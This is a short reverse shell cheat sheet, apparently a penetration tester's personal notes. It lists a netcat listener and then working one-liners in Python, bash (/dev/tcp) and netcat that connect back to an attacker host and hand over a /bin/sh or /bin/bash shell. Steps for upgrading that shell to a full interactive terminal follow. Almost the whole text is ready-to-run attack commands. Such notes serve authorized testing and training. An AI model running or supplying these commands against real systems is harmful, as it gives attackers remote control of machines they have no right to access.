Reverse Shell - Cheat Sheet


Get a Reverse Shell

This is a list of reverse shell methods I've used over time; it will be updated whenever I find and successfully use another one.


To get a reverse shell, the first thing we need is a listener on our local machine. Take note of the port used and the local IP address (LHOST); both will also be used in the command run on the remote machine. The simplest way is with netcat, as follows:

nc -nlvp <PORT>


python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'


bash

bash -i >& /dev/tcp/<LHOST>/<PORT> 0>&1


netcat

nc -e /bin/sh <LHOST> <PORT>



Upgrade shell

Usually when we successfully get a reverse shell, the shell is limited; we can tell because when we try to autocomplete a command or a filename, it prints a tab character (\t) instead.
The easiest and most common way to upgrade the shell is with python; the only requirement is actually having python installed on the remote machine. Then follow these steps:

python -c "import pty; pty.spawn('/bin/bash')"

export TERM=xterm

Then we need to background the remote shell process: Ctrl + Z

stty raw -echo; fg

reset


Finally, we'll be presented with an upgraded shell.

